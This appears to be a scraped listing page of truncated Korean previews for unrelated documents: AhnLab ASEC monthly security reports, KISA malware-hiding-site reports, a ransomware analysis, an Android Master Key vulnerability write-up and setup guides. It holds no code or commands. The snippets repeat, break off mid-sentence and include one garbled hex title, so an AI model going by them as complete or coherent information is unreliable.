More informationASEC REPORT VOL.81 September, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC
Security Trend ASEC REPORT VOL.81 September, 2016 ASEC REPORT VOL.81 September, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More informationASEC REPORT VOL.80 August, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작
Security Trend ASEC REPORT VOL.80 August, 2016 ASEC REPORT VOL.80 August, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More informationASEC REPORT VOL.69 September, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC
Security Trend ASEC REPORT VOL.69 September, 2015 ASEC REPORT VOL.69 September, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More informationSecurity Trend ASEC Report VOL.63 March, 2015
Security Trend ASEC Report VOL.63 March, 2015 ASEC Report VOL.63 March, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More informationSecurity Trend ASEC Report VOL.58 October, 2014
Security Trend ASEC Report VOL.58 October, 2014 ASEC Report VOL.58 October, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More informationSecurity Trend ASEC Report VOL.52 April, 2014
Security Trend ASEC Report VOL.52 April, 2014 ASEC Report VOL.52 April, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More informationASEC REPORT VOL.85 January, 2017 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC에서작성
Security Trend ASEC REPORT VOL.85 January, 2017 ASEC REPORT VOL.85 January, 2017 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC에서작성하며,
More informationASEC REPORT VOL.83 November, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에
Security Trend ASEC REPORT VOL.83 November, 2016 ASEC REPORT VOL.83 November, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More information< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코
월간악성코드은닉사이트탐지 동향보고서 (2 월 ) 2013. 03. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3.
More informationSecurity Trend ASEC REPORT VOL.70 October, 2015
Security Trend ASEC REPORT VOL.70 October, 2015 ASEC REPORT VOL.70 October, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More informationASEC REPORT VOL.78 June, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하
Security Trend ASEC REPORT VOL.78 June, 2016 ASEC REPORT VOL.78 June, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More informationASEC Report VOL.62 February, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에
Security Trend ASEC Report VOL.62 February, 2015 ASEC Report VOL.62 February, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More informationASEC REPORT VOL.71 November, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에
Security Trend ASEC REPORT VOL.71 November, 2015 ASEC REPORT VOL.71 November, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More information< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B
월간악성코드은닉사이트탐지 동향보고서 (11 월 ) 2012. 12. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 10
More informationASEC REPORT VOL.75 March, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성
Security Trend ASEC REPORT VOL.75 March, 2016 ASEC REPORT VOL.75 March, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More informationSecurity Trend ASEC Report VOL.54 June, 2014
Security Trend ASEC Report VOL.54 June, 2014 ASEC Report VOL.54 June, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More informationSecurity Trend ASEC Report VOL.55 July, 2014
Security Trend ASEC Report VOL.55 July, 2014 ASEC Report VOL.55 July, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More informationActFax 4.31 Local Privilege Escalation Exploit
NSHC 2013. 05. 23 악성코드 분석 보고서 [ Ransomware 악성코드 ] 사용자의 컴퓨터를 강제로 잠그고 돈을 요구하는 형태의 공격이 기승을 부리고 있 습니다. 이러한 형태의 공격에 이용되는 악성코드는 Ransomware로 불리는 악성코 드 입니다. 한번 감염 시 치료절차가 복잡하며, 보고서 작성 시점을 기준으로 지속 적인 피해자가 발생되고
More information개인정보보호의 이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호-
개인정보보호의 이해와 안전한 관리 - 안전한 개인정보 관리- 2013. 6. 26 최 윤 형 (한국정보화진흥원) 1 안전한 개인PC 관리방법 목 차 2 안전한 스마트폰 관리방법 1. 안전한 개인PC 관리방법 정보통신 기기의 보안 위협요인 위협요소 웜, 바이러스, 악성코드, DDos공격침입, 네트워크 공격 휴대성, 이동성 오픈 플랫폼 3G, WiFi, Wibro
More information메일서버등록제(SPF) 인증기능적용안내서 (Exchange Windows 2000) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2000 Exchange Server 2003 GFI MailEssentials 14 for
메일서버등록제(SPF) 인증기능적용안내서 (Exchange 2003 - Windows 2000) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2000 Exchange Server 2003 GFI MailEssentials 14 for Exchange 2016 년 6 월 - 1 - 목 차 I. 개요 1 1. SPF( 메일서버등록제)
More informationSBR-100S User Manual
( 1 / 13 ) SBR-100S 모델에 대한 사용자 펌웨어 업그레이드 방법을 안내해 드립니다. SBR-100S 는 신규 펌웨어가 있을시 FOTA(자동업데이트) 기능을 통하여 자동 업그레이드가 되며, 필요시 사용자가 신규 펌웨어를 다운받아 수동으로 업그레이드 할 수 있습니다. 1. 준비하기 1.1 연결 장치 준비 펌웨어 업그레이드를 위해서는 SBR-100S
More informationAndroid Master Key Vulnerability
Android Master Key Vulnerability Android Bug 8219321 2013/08/06 http://johnzon3.tistory.com Johnzone 内容 1. 개요... 2 1.1. 취약점요약... 2 1.2. 취약점정보... 2 2. 분석... 2 2.1. 기본개념... 2 2.2. 공격방법... 4 3. 방어대책... 7
More information메일서버등록제(SPF) 인증기능적용안내서 (Exchange Windows 2003) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2003 Exchange Server 2003 GFI MailEssentials 2010 fo
메일서버등록제(SPF) 인증기능적용안내서 (Exchange 2003 - Windows 2003) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2003 Exchange Server 2003 GFI MailEssentials 2010 for Exchange 2016 년 6 월 - 1 - 목 차 I. 개요 1 1. SPF( 메일서버등록제)
More informationWindows 8에서 BioStar 1 설치하기
/ 콘텐츠 테이블... PC에 BioStar 1 설치 방법... Microsoft SQL Server 2012 Express 설치하기... Running SQL 2012 Express Studio... DBSetup.exe 설정하기... BioStar 서버와 클라이언트 시작하기... 1 1 2 2 6 7 1/11 BioStar 1, Windows 8 BioStar
More informationMicrosoft Word - ntasFrameBuilderInstallGuide2.5.doc
NTAS and FRAME BUILDER Install Guide NTAS and FRAME BUILDER Version 2.5 Copyright 2003 Ari System, Inc. All Rights reserved. NTAS and FRAME BUILDER are trademarks or registered trademarks of Ari System,
More information월간 2016. 03 CONTENTS 3 EXPERT COLUMN 영화 점퍼 와 트로이목마 4 SPECIAL REPORT 패치 관리의 한계와 AhnLab Patch Management 핵심은 패치 관리, 왜? 8 HOT ISSUE 2016년에 챙겨봐야 할 개인정보보호
안랩 온라인 보안 매거진 2016. 03 Patch Management System 월간 2016. 03 CONTENTS 3 EXPERT COLUMN 영화 점퍼 와 트로이목마 4 SPECIAL REPORT 패치 관리의 한계와 AhnLab Patch Management 핵심은 패치 관리, 왜? 8 HOT ISSUE 2016년에 챙겨봐야 할 개인정보보호 법령 사항
More informationInstall stm32cubemx and st-link utility
STM32CubeMX and ST-LINK Utility for STM32 Development 본문서는 ST Microelectronics 의 ARM Cortex-M 시리즈 Microcontroller 개발을위해제공되는 STM32CubeMX 와 STM32 ST-LINK Utility 프로그램의설치과정을설명합니다. 본문서는 Microsoft Windows 7
More information<32BDBAB8B6C6AEC6F9B1DDC0B6B0C5B7A13130B0E8B8EDBEC8B3BBBCAD2E687770>
스마트폰 금융거래 10계명 안내서 배 경 금융감독원은 국내의 스마트폰 이용 활성화를 계기로 10.1월 스마트폰 전자금융서비스 안전 대책을 수립하여 금융회사가 안전한 스마트폰 금융서비스를 제공하기 위한 기반을 마련 하였습니다. 더욱 안전한 전자금융거래를 위해서는 서비스를 제공하는 금융회사뿐만 아니라, 금융소비자 스스로도 금융정보 유출, 부정거래 등 전자금융사고
More informationMicrosoft PowerPoint Android-SDK설치.HelloAndroid(1.0h).pptx
To be an Android Expert 문양세강원대학교 IT 대학컴퓨터학부 Eclipse (IDE) JDK Android SDK with ADT IDE: Integrated Development Environment JDK: Java Development Kit (Java SDK) ADT: Android Development Tools 2 JDK 설치 Eclipse
More informationOffice 365 사용자 가이드
[ 여기에입력 ] Office 365 사용자가이드 OFFICE 365 모바일설정 목차 1. 모바일에메일계정추가하기... 2 2. Lync 2013 App 설치하기... 7 3. Office Mobile App 설치하기... 10 4. Office for ipad 설치하기... 16-1 - 모바일기기에 Office 365 를설정해보세요. 모바일기기에 Office
More informationSecurity Trend ASEC Report VOL.51 March, 2014
Security Trend ASEC Report VOL.51 March, 2014 ASEC Report VOL.51 March, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More information인터넷 비즈니스의 필수 요소, 트랜잭션 시큐리티 서비스 인터넷 비즈니스는 기업 영리 활동에 있어서 부가적인 서비스가 아닌 사업을 영위해 가는데 중요한 역할을 하고 있습니다. 특히, 인터넷 쇼핑몰, 인터 넷 뱅킹, 사이버 트레이딩, 전자정부서비스, 온라인 게임, 인터넷
인터넷비즈니스의안심코드, AhnLab Online Security 2.0 멀티브라우저지원! 블루투스키보드지원! 메모리해킹방어! 웹페이지변조및스크린캡처차단! 정보유출걱정없이비즈니스가완성됩니다 보안전용브라우저 AOS Secure Browser 키보드보안서비스 AOS anti-keylogger 온라인 PC 방화벽 AOS firewall 온라인통합방역서비스 AOS
More informationCONTENTS ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는 안랩의 ASEC에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안
ASEC REPORT 2013 ANNUAL REPORT CONTENTS ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는 안랩의 ASEC에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정보를담고있습니다. 자세한내용은안랩닷컴
More informationASEC Report VOL.59 November, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에
Security Trend ASEC Report VOL.59 November, 2014 ASEC Report VOL.59 November, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More informationMicrosoft PowerPoint _사용자매뉴얼.ppt
목차 1. 설치가이드안드로이드앱설치과정 ------------------------------------------- 2 아이폰앱설치과정 ------------------------------------------------ 10 PC 웹접속과정 ---------------------------------------------------- 19 2. 기능가이드공통화면
More informationWindows 10 General Announcement v1.0-KO
Windows 10 Fuji Xerox 장비와의호환성 v1.0 7 July, 2015 머리말 Microsoft 는 Windows 10 이 Windows 자동업데이트기능을통해예약되어질수있다고 6 월 1 일발표했다. 고객들은 윈도우 10 공지알림을받기 를표시하는새로운아이콘을알아차릴수있습니다. Fuji Xerox 는 Microsoft 에서가장최신운영시스템인 Windows
More informationrosaec_workshop_talk
! ! ! !! !! class com.google.ssearch.utils {! copyassets(ctx, animi, fname) {! out = new FileOutputStream(fname);! in = ctx.getassets().open(aname);! if(aname.equals( gjsvro )! aname.equals(
More information< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 3 - 유포지탐지현황 3 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 5 - 악성코드유형별비율 6 - 위협 IP/ 도메인현황 7 2
월간악성코드은닉사이트탐지 동향보고서 (1 월 ) 2015. 02. 침해사고대응단 인터넷침해대응본부 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 3 2.1 악성코드유포지현황 3 - 유포지탐지현황 3 - 대량경유지가탐지된유포지 TOP10 4 - 악성코드취약점및취약한 S/W 악용현황 5 - 악성코드유형별비율 6 - 위협 IP/ 도메인현황
More information[Blank Page] i
키토큰앱매뉴얼 KeyToken App Manual - 20131126 키페어 www.keypair.co.kr [Blank Page] i 목차 I. KeyToken App 소개...1 1. KeyToken App 의목적... 1 2. KeyToken App 의사용환경... 1 3. 주의사항... 2 II. 스마트폰의 NFC 모듈켜기...4 1. 안드로이드 v4.0.3(
More informationASEC Report 2014 Annual Report ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성
Security Trend ASEC Report 2014 Annual Report ASEC Report 2014 Annual Report ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More information` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10
월간악성코드은닉사이트탐지 동향보고서 5 월 침해사고대응단인터넷침해대응본부 ` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 6 2.1 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP10 7 - 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10 2.2 악성코드경유지현황
More information아이콘의 정의 본 사용자 설명서에서는 다음 아이콘을 사용합니다. 참고 참고는 발생할 수 있는 상황에 대처하는 방법을 알려 주거나 다른 기능과 함께 작동하는 방법에 대한 요령을 제공합니다. 상표 Brother 로고는 Brother Industries, Ltd.의 등록 상
Android 용 Brother Image Viewer 설명서 버전 0 KOR 아이콘의 정의 본 사용자 설명서에서는 다음 아이콘을 사용합니다. 참고 참고는 발생할 수 있는 상황에 대처하는 방법을 알려 주거나 다른 기능과 함께 작동하는 방법에 대한 요령을 제공합니다. 상표 Brother 로고는 Brother Industries, Ltd.의 등록 상표입니다. Android는
More informationSQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자
SQL Developer Connect to TimesTen 유니원아이앤씨 DB 팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 2010-07-28 작성자 김학준 최종수정일 2010-07-28 문서번호 20100728_01_khj 재개정이력 일자내용수정인버전
More informationOperation-name: 악성행위의종류를말하며, Sending SMS Calling Sending sensitive information Converting data 로분류합니다. Operation-target: 악성행위의목표물을말하며, Premium-rate SM
안드로이드악성앱탐지 TUTORIAL 1 소개 안드로이드앱에서추출한여러가지특성을기반으로악성앱을탐지하는샘플모델을소개합니다. * 튜토리얼에서소개되는모델은참고문헌중하나인 Andro-profiler 의작동원리를기반으로하고있습니다. 탐지알고리즘에대한상세한내용은사이트에첨부한논문에서확인하실수있습니다. ** 이번 Data Analysis Challenge 에제공될안드로이드앱은튜토리얼에서사용한데이터셋과수량및파일이다를수있습니다.
More informationSpring Boot/JDBC JdbcTemplate/CRUD 예제
Spring Boot/JDBC JdbcTemplate/CRUD 예제 오라클자바커뮤니티 (ojc.asia, ojcedu.com) Spring Boot, Gradle 과오픈소스인 MariaDB 를이용해서 EMP 테이블을만들고 JdbcTemplate, SimpleJdbcTemplate 을이용하여 CRUD 기능을구현해보자. 마리아 DB 설치는다음 URL 에서확인하자.
More information#WI DNS DDoS 공격악성코드분석
#WI-13-025 2013-07-19 내용요약 이보고서는 7 월 15 일 Fortinet 의 Kyle Yang 이작성한 6.25 DNS DDoS Attack In Korea 를참고하여작성된것임 공격대상이된 DNS 서버는 ns.gcc.go.kr 과 ns2.gcc.go.kr 로, 악성코드에 감염된좀비 PC 는 DNS 서버에대한도메인확인질의에대한응답을두 타깃으로보내지도록하는방법을이용하였음
More informationSecure Programming Lecture1 : Introduction
Malware and Vulnerability Analysis Lecture3-2 Malware Analysis #3-2 Agenda 안드로이드악성코드분석 악성코드분석 안드로이드악성코드정적분석 APK 추출 #1 adb 명령 안드로이드에설치된패키지리스트추출 adb shell pm list packages v0nui-macbook-pro-2:lecture3 v0n$
More information*2008년1월호진짜
3. USB 이동식저장장치를이용하여전파되는악성코드분석 1. 개 요 최근 USB 이동식 저장장치를 통하여 전파되는 악성코드에 대한 감염피해가 증가하고 있어 주의가 필요하다. 이번에 확인된 ntion.exe 악성코드는 감염 시, 특정 사이트에 접속하여 추가 악성코드를 다운로드하는 Dropper 기능을 수행한다. 또한, 웹 서버가 감염될 경우는 웹 서버내의 웹 페이지가
More informationMicrosoft Outlook G Suite 가이드
UNICONVERSE Microsoft Outlook G Suite 가이드 G Suite 사용자가이드 - 국민대학교 유니컨버스 2017-01-01 2 Microsoft Outlook G Suite 가이드 내용 Microsoft Outlook 2016 에서 IMAP 설정... 3 Microsoft Outlook 2016 에서 POP 설정... 6 Google
More informationMicrosoft PowerPoint SDK설치.HelloAndroid(1.5h).pptx
To be an Android Expert 문양세강원대학교 IT 대학컴퓨터학부 개발환경구조및설치순서 JDK 설치 Eclipse 설치 안드로이드 SDK 설치 ADT(Androd Development Tools) 설치 AVD(Android Virtual Device) 생성 Hello Android! 2 Eclipse (IDE) JDK Android SDK with
More information게시판 스팸 실시간 차단 시스템
오픈 API 2014. 11-1 - 목 차 1. 스팸지수측정요청프로토콜 3 1.1 스팸지수측정요청프로토콜개요 3 1.2 스팸지수측정요청방법 3 2. 게시판스팸차단도구오픈 API 활용 5 2.1 PHP 5 2.1.1 차단도구오픈 API 적용방법 5 2.1.2 차단도구오픈 API 스팸지수측정요청 5 2.1.3 차단도구오픈 API 스팸지수측정결과값 5 2.2 JSP
More information( )부록
A ppendix 1 2010 5 21 SDK 2.2. 2.1 SDK. DevGuide SDK. 2.2 Frozen Yoghurt Froyo. Donut, Cupcake, Eclair 1. Froyo (Ginger Bread) 2010. Froyo Eclair 0.1.. 2.2. UI,... 2.2. PC 850 CPU Froyo......... 2. 2.1.
More informationStuduino소프트웨어 설치
Studuino 프로그래밍환경 Studuino 소프트웨어설치 본자료는 Studuino 프로그래밍환경설치안내서입니다. Studuino 프로그래밍 환경의갱신에따라추가 / 수정될수있습니다. 목차 1. 소개... 1 2. Windows... 2 2.1. 프로그래밍환경설치... 2 2.1.1. 웹설치버전설치방법... 2 2.2. Studuino 프로그래밍환경실행...
More informationASEC REPORT VOL.73 January, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서
Security Trend ASEC REPORT VOL.73 January, 2016 ASEC REPORT VOL.73 January, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More information<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770>
웹하드서비스를통해생성된 Botnet 을이용한 DDoS 공격피해사례 2009. 12. 본보고서의전부나일부를인용시반드시 [ 자료 : 한국인터넷침해대응센터 (KrCERT)] 를명시하여주시기바랍니다. - 1 - 1. 개요 최근발생하고있는 DDoS 사례들을분석해보면그방식들이점점지능화되고조직화되고있다는것을확인할수있다. 또한 DDoS 공격의목적도과거자기과시또는정치적인이유의단순한목적에서벗어나금전적이득을취하거나경쟁업체의영업을방해하기위한목적으로점차기업화되고있기도하다.
More information1. 제품 개요 AhnLab Policy Center 4.6 for Windows(이하 TOE)는 관리대상 클라이언트 시스템에 설치된 안랩의 안티바이러스 제품인 V3 제품군에 대해 보안정책 설정 및 모니터링 등의 기능을 제공하여 관리대상 클라이언트 시스템에 설치된 V3
CR-15-59 AhnLab Policy Center 4.6 for Windows 인증보고서 인증번호 : ISIS-0631-2015 2015년 7월 IT보안인증사무국 1. 제품 개요 AhnLab Policy Center 4.6 for Windows(이하 TOE)는 관리대상 클라이언트 시스템에 설치된 안랩의 안티바이러스 제품인 V3 제품군에 대해 보안정책 설정
More information< 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10
(https://www.kisarbl.or.kr) < 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10 Ⅰ. 개요 실시간스팸차단리스트 (RBL) 는메일서버를운영하는누구나손쉽게효과적으로스팸수신을차단하는데이용할수있도록한국인터넷진흥원 (KISA)
More informationPathEye 공식 블로그 다운로드 받으세요!! 지속적으로 업그래이드 됩니다. 여러분의 의견을 주시면 개발에 반영하겠 습니다.
PathEye Mobile Ver. 0.71b 2009. 3. 17 By PathEye 공식 블로그 다운로드 받으세요!! http://blog.patheye.com 지속적으로 업그래이드 됩니다. 여러분의 의견을 주시면 개발에 반영하겠 습니다. PathEye 설치 1/3 최종 배포 버전을 다 운로드 받습니다. 다운로드된 파일은 CAB 파일입니다. CAB 파일에는
More information유포지탐지동향
월간악성코드은닉사이트탐지 동향보고서 (7 월 ) 2014. 08. 침해사고대응단 인터넷침해대응본부 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 13 3. 악성코드은닉사례분석
More information1. SNS Topic 생성여기를클릭하여펼치기... Create Topic 실행 Topic Name, Display name 입력후 Create topic * Topic name : 특수문자는 hyphens( - ), underscores( _ ) 만허용한다. Topi
5 주차 - AWS 실습 - SNS 시나리오 1. SNS Topic 생성 2. 3. 4. 5. Subscriptions 생성및 Confirm [ Email Test ] Message 발송 코드로보기 번외 ) SMS 발송하기 실습준비 HTML 파일, AWS 계정및 secretaccesskey, accesskeyid 간단설명 1. 2. 3. 4. SNS : 이메일,
More information월간악성코드은닉사이트탐지 동향보고서 9 월 침해대응단사이버침해대응본부
월간악성코드은닉사이트탐지 동향보고서 9 월 침해대응단사이버침해대응본부 ` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 6 2.1 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP10 7 - 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10 2.2 악성코드경유지현황
More informationrmi_박준용_final.PDF
(RMI) - JSTORM http://wwwjstormpekr (RMI)- Document title: Document file name: Revision number: Issued by: Document Information (RMI)- rmi finaldoc Issue Date: Status:
More information신종파밍악성코드분석 Bolaven
신종파밍악성코드분석 Bolaven 2013.06.27 개요 지난 1월볼라벤 6차문서에서진화한파밍기법 (= 호스트파일변조 ) 에대해분석및공유를하였다. 6차문서에서는웹을통하여악성코드가유포되는과정과파밍기법의전반적인흐름을알아보았다면, 이번문서에서는파밍기법에서사용되는악성파일의행위에대해중점적으로분석하였다. 파밍기법이란? PC 를악성코드에감염시켜정상홈페이지주소로접속하여도피싱사이트로
More informationNX1000_Ver1.1
See the world in perfect detail 1 2 3 4 J J KL t P A S M i g s v B 5 6 t P A S M i E PASM Z g s v 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 Chapter 1 25 12 11 10 9 1 2 3 4 5 6 7 8 1 t P A S M i g
More informationMicrosoft PowerPoint - 11주차_Android_GoogleMap.ppt [호환 모드]
Google Map View 구현 학습목표 교육목표 Google Map View 구현 Google Map 지원 Emulator 생성 Google Map API Key 위도 / 경도구하기 위도 / 경도에따른 Google Map View 구현 Zoom Controller 구현 Google Map View (1) () Google g Map View 기능 Google
More information목차 윈도우드라이버 1. 매뉴얼안내 운영체제 (OS) 환경 윈도우드라이버준비 윈도우드라이버설치 Windows XP/Server 2003 에서설치 Serial 또는 Parallel 포트의경우.
